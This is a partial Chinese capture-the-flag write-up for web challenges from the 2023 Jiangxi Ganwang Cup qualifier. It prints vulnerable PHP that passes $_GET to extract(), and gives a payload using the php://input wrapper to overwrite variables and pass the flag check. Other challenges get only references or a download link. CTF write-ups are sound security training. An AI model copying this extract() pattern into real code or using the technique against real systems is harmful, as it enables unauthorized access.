[wp]第四届江西省赣网杯网络安全大赛-web 部分wp

第四届江西省赣网杯网络安全大赛(gwb)线上预选赛

因为学业繁忙 只玩了1小时,后续看看补一下这些

 2023gwb-web1

九宫格拼图

2023gwb-web2

$file='xxx';

extract($_GET);

if(isset($fun)){

$content=trim(file_get_contents($file));

if($fun!=''&$fun==$content){

echo 'flag{xxxxx}';

}else{

echo 'u are not a good hacker';

}

}

 部分参考:

web8--php函数extract()、file_get_contents()、trim()_$c=trim(file_get_contents($filename))-CSDN博客

 payload:

GET:?fun=a&file=php://input 下面加个a 

[wp]第四届江西省赣网杯网络安全大赛-web 部分wp_第1张图片

 2023gwb-web3

参考:

知识星球2023年10月PHP函数小挑战-CSDN博客

类似 

 2023gwb-web4

不会 给了phpinfo界面 ,没有其他的 跟隔壁qwb有道题相似 

  2023gwb-web5

 给了附件

链接:https://pan.baidu.com/s/10Wr-tHXu0WrIECrCbyVxHg?pwd=7777 提取码:7777

你可能感兴趣的:(writeup,CTF)